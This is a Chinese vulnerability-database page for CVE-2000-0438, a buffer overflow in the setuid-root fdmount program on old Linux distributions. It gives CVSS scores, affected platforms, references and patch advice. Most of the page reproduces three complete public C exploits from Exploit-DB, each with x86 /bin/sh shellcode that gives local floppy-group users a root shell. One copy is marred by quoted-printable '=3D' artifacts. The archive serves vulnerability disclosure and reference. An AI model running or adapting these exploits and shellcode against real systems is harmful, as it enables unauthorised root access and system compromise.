CVE-2000-0438
CVSS7.2
发布时间 :2000-05-22 00:00:00
修订时间 :2008-09-10 15:04:41
NMCOE    

[原文]Buffer overflow in fdmount on Linux systems allows local users in the "floppy" group to execute arbitrary commands via a long mountpoint parameter.


[CNNVD]Multiple Linux 供应商fdmount缓冲区溢出漏洞(CNNVD-200005-079)

        Linux系统中fdmount存在缓冲区溢出漏洞。"floppy"组中的本地用户借助超长mountpoint参数执行任意命令。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:caldera:openlinux:7.0
cpe:/o:slackware:slackware_linux:3.5
cpe:/o:turbolinux:turbolinux:6.0.1
cpe:/o:turbolinux:turbolinux:6.0
cpe:/o:slackware:slackware_linux:3.3
cpe:/o:suse:suse_linux:6.3SuSE SuSE Linux 6.3
cpe:/o:slackware:slackware_linux:3.6
cpe:/o:suse:suse_linux:4.3SuSE SuSE Linux 4.3
cpe:/o:suse:suse_linux:6.4SuSE SuSE Linux 6.4
cpe:/o:suse:suse_linux:6.1SuSE SuSE Linux 6.1
cpe:/o:turbolinux:turbolinux:6.0.2
cpe:/o:slackware:slackware_linux:3.4
cpe:/o:suse:suse_linux:6.2SuSE SuSE Linux 6.2
cpe:/o:suse:suse_linux:4.4.1SuSE SuSE Linux 4.4.1
cpe:/o:suse:suse_linux:7.0SuSE SuSE Linux 7.0
cpe:/o:slackware:slackware_linux:4.0
cpe:/o:suse:suse_linux:6.0SuSE SuSE Linux 6.0
cpe:/o:suse:suse_linux:4.4SuSE SuSE Linux 4.4
cpe:/o:suse:suse_linux:5.3SuSE SuSE Linux 5.3
cpe:/o:suse:suse_linux:5.1SuSE SuSE Linux 5.1
cpe:/o:suse:suse_linux:4.2SuSE SuSE Linux 4.2
cpe:/o:suse:suse_linux:5.0SuSE SuSE Linux 5.0
cpe:/o:slackware:slackware_linux:3.9
cpe:/o:suse:suse_linux:5.2SuSE SuSE Linux 5.2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0438
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0438
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200005-079
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1239
(UNKNOWN)  BID  1239
http://archives.neohapsis.com/archives/bugtraq/2000-05/0245.html
(UNKNOWN)  BUGTRAQ  20000522 fdmount buffer overflow

- 漏洞信息

Multiple Linux 供应商fdmount缓冲区溢出漏洞
高危 缓冲区溢出
2000-05-22 00:00:00 2006-09-21 00:00:00
本地  
        Linux系统中fdmount存在缓冲区溢出漏洞。"floppy"组中的本地用户借助超长mountpoint参数执行任意命令。

- 公告与补丁

        MandrakeSoft has provided a source patch to this problem. It is expected that both MandrakeSoft and SuSE will release RPM's to fix this problem shortly.
        A suitable solution may be to remove the setuid bit on the fdmount binary, or remove non-trusted users from the 'floppy' group.

- 漏洞信息 (19952)

S.u.S.E. 4.x/5.x/6.x/7.0,Slackware 3.x/4.0,Turbolinux 6,OpenLinux 7.0 fdmount Buffer Overflow (1) (EDBID:19952)
linux local
2000-05-22 Verified
0 Paulo Ribeiro
N/A [点击下载]
source: http://www.securityfocus.com/bid/1239/info

A buffer overflow exists in the 0.8 version of the fdmount program, distributed with a number of popular versions of Linux. By supplying a large, well crafted buffer containing machine executable code in place of the mount point, it is possible for users in the 'floppy' group to execute arbitrary commands as root.

This vulnerability exists in versions of S.u.S.E., 4.0 and later, as well as Mandrake Linux 7.0. TurboLinux 6.0 and earlier ships with fdmount suid root, but users are not automatically added to the 'floppy' group. This list is by no means meant to be complete; other Linux distributions may be affected. To check if you're affected, check for the presence of the setuid bit on the binary. If it is present, and the binary is either world executable, or group 'floppy' executable, you are affected and should take action immediately. 

/*
 * fdmount 0.8 buffer-overflow exploit (fd-ex.c)
 * (C) 2000 Paulo Ribeiro <prrar@nitnet.com.br>
 *
 * Systems tested: Slackware Linux 7.0
 * 
 * Remember: you have to be a member of floppy group to exploit it!
 */ 

#include <stdlib.h>

#define DEFAULT_OFFSET                    0   
#define DEFAULT_BUFFER_SIZE             180
#define DEFAULT_EGG_SIZE               2048
#define NOP                            0x90

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" 
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_esp(void) {
   __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
  char *buff, *ptr, *egg;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i, eggsize=DEFAULT_EGG_SIZE;

  if (argc > 1) bsize   = atoi(argv[1]);
  if (argc > 2) offset  = atoi(argv[2]);
  if (argc > 3) eggsize = atoi(argv[3]);
  
  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n"); 
    exit(0);
  }
  if (!(egg = malloc(eggsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  addr = get_esp() - offset;
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr; 

  ptr = egg;
  for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
    *(ptr++) = NOP;
 
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i]; 
   
  buff[bsize - 1] = '\0';
  egg[eggsize - 1] = '\0';

  memcpy(egg,"EGG=",4);
  putenv(egg);
  memcpy(buff,"RET=",4);                  
  putenv(buff);
  system("/usr/bin/fdmount fd0 $RET");     
}

/* fd-ex.c: EOF */
		

- 漏洞信息 (19953)

S.u.S.E. 4.x/5.x/6.x/7.0,Slackware 3.x/4.0,Turbolinux 6,OpenLinux 7.0 fdmount Buffer Overflow (2) (EDBID:19953)
linux local
2000-05-22 Verified
0 Scrippie
N/A [点击下载]
source: http://www.securityfocus.com/bid/1239/info
 
A buffer overflow exists in the 0.8 version of the fdmount program, distributed with a number of popular versions of Linux. By supplying a large, well crafted buffer containing machine executable code in place of the mount point, it is possible for users in the 'floppy' group to execute arbitrary commands as root.
 
This vulnerability exists in versions of S.u.S.E., 4.0 and later, as well as Mandrake Linux 7.0. TurboLinux 6.0 and earlier ships with fdmount suid root, but users are not automatically added to the 'floppy' group. This list is by no means meant to be complete; other Linux distributions may be affected. To check if you're affected, check for the presence of the setuid bit on the binary. If it is present, and the binary is either world executable, or group 'floppy' executable, you are affected and should take action immediately. 

/*      
   Welcome dear reader - be it scriptkiddy, whose sole intent it is to
   destroy precious old Unix boxes or Assembly Wizard whose sole intent =
it 
   is to correct my code and send me a flame.
   
   The fdutils package contains a setuid root file that is used by the =
floppy 
   group to mount and unmount floppies. If you are not in this group, =
this
   exploit will not work.
   
   This thingy was tested on Slackware 4.0 and 7.0
   
   Use as: fdmount-exp [offset] [buf size] [valid text ptr]
   
   Since the char * text is overwritten in void errmsg(char *text) we =
should
   make sure that this points to a valid address (something in the .data
   section should do perfectly). The hard coded one used works on my =  
box,
   to find the one you need use something like:
   
   objdump --disassemble-all $(whereis -b fdmount) | grep \<.data\> \
   cut -d " " -f1
   
   The HUGE number of nops is needed to make sure this exploit works.
   Since it Segfaults out of existence without removing /etc/mtab~ we
   only get one try...
   
   Take care with your newly aquired EUID 0!
   
   Cheers go out to: #phreak.nl #b0f #hit2000 #root66
   The year 2000 scriptkiddie award goed to: Gerrie Mansur
   Love goes out to: Hester, Maja (you're so cute!), Dopey
   
   -- Yours truly,
                Scrippie - ronald@grafix.nl - buffer0verfl0w security
                                            - #phreak.nl
*/                                          
                                            
#include <stdio.h>                          
   
#define NUM_NOPS 500

// Gee, Aleph1 his shellcode is back once more
        
char shellcode[] =3D
   "\x31\xc0\xb0\x17\x31\xdb\xcd\x80"
   "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
   "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
   "\x80\xe8\xdc\xff\xff\xff/bin/sh";
   
unsigned long get_sp(void) { 
   __asm__("movl %esp, %eax");
}  
   
main(int argc, char **argv)
{      
   int buf_size =3D 71;
   int offset=3D0, i;
   
   char *overflow;
   char *ovoff;
   long addr, ptr=3D0x0804c7d0;
   
   if(argc>1) offset =3D atoi(argv[1]);
   if(argc>2) buf_size =3D atoi(argv[2]);
   if(argc>3) ptr =3D strtol(argv[3], (char **) NULL, 16);
   
   printf("##############################################\n"); 
   printf("# fdmount Slack 4/7 exploit  -  by Scrippie  #\n");
   printf("##############################################\n");
   printf("Using offset: %d\n", offset);
   printf("Using buffer size: %d\n", buf_size);
   printf("Using 0x%x for \"void errmsg(char *text,...)\" char *text\n", =
ptr);
   
   if(!(overflow =3D (char = 
*)malloc(buf_size+16+NUM_NOPS+strlen(shellcode)))) {
      fprintf(stderr, "Outta memory - barging out\n");
      exit(-1);
   }
   
   overflow[0] =3D '/';
   
   for(i=3D1;i<buf_size;i++) {
      overflow[i] =3D 0x90;
   }            
                                            
   addr =3D get_sp() - offset;              
                                            
   printf("Resulting address: 0x%x\n", addr);
   
   memcpy(overflow + strlen(overflow), (void *) &addr, 4);
   memcpy(overflow + strlen(overflow), (void *) &ptr, 4);
   memcpy(overflow + strlen(overflow), (void *) &ptr, 4);
   memcpy(overflow + strlen(overflow), (void *) &ptr, 4);

   ovoff =3D overflow + strlen(overflow);
   
   for(i=3D0;i<NUM_NOPS;i++) {
      *ovoff =3D 0x90;
      *ovoff++;
   }
   
   strcpy(ovoff, shellcode);
   
   execl("/usr/bin/fdmount", "fdmount", "fd0", overflow, NULL);
       
   return 0;
}  
/*                    www.hack.co.za           [18 May]*/
		

- 漏洞信息 (19954)

S.u.S.E. 4.x/5.x/6.x/7.0,Slackware 3.x/4.0,Turbolinux 6,OpenLinux 7.0 fdmount Buffer Overflow (3) (EDBID:19954)
linux local
2000-05-22 Verified
0 WaR
N/A [点击下载]
source: http://www.securityfocus.com/bid/1239/info
  
A buffer overflow exists in the 0.8 version of the fdmount program, distributed with a number of popular versions of Linux. By supplying a large, well crafted buffer containing machine executable code in place of the mount point, it is possible for users in the 'floppy' group to execute arbitrary commands as root.
  
This vulnerability exists in versions of S.u.S.E., 4.0 and later, as well as Mandrake Linux 7.0. TurboLinux 6.0 and earlier ships with fdmount suid root, but users are not automatically added to the 'floppy' group. This list is by no means meant to be complete; other Linux distributions may be affected. To check if you're affected, check for the presence of the setuid bit on the binary. If it is present, and the binary is either world executable, or group 'floppy' executable, you are affected and should take action immediately. 

/* fdmount exploit
 *
 * by [WaR] <war@genhex.org> and Zav <zav@genhex.org>
 *
 * usage: ./fdmountx <offset>
 *   try with offset around 390 (you'll only get one try) 
 *
 *  Shout outs to all of the GenHex crew, and to 
 *            the #newbreed at irc.ptnet.org.
 */

#include <stdio.h>
#include <stdlib.h>

#define BUFFSIZE 70

char shell[] = /* by Zav */
   "\xeb\x33\x5e\x89\x76\x08\x31\xc0"
   "\x88\x66\x07\x83\xee\x02\x31\xdb"
   "\x89\x5e\x0e\x83\xc6\x02\xb0\x1b"
   "\x24\x0f\x8d\x5e\x08\x89\xd9\x83"
   "\xee\x02\x8d\x5e\x0e\x89\xda\x83"
   "\xc6\x02\x89\xf3\xcd\x80\x31\xdb"
   "\x89\xd8\x40\xcd\x80\xe8\xc8\xff"
   "\xff\xff/bin/sh";


main(int argc, char **argv)
{
  int i,j;
  char buffer[BUFFSIZE+6]; 
  unsigned long eip=(unsigned long)&eip;
  unsigned long *ptr;


  if(argc>1)
   eip+=atoi(argv[1]);

  memset(buffer,0x90,75);
  memcpy(buffer+(BUFFSIZE-strlen(shell)),shell,strlen(shell));

 ptr=(unsigned long*)(buffer+71);
 *ptr=eip;

 buffer[75]=0;
 buffer[0]='/';

 execl("/usr/bin/fdmount","fdmount","fd0",buffer,NULL);
}

		

- 漏洞信息

1347
Multiple Linux Vendor fdmount Buffer Overflow
Local Access Required Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2000-05-22 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, patches have been released by multiple Linux distributions, as well as a poster responding to the original disclosure.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站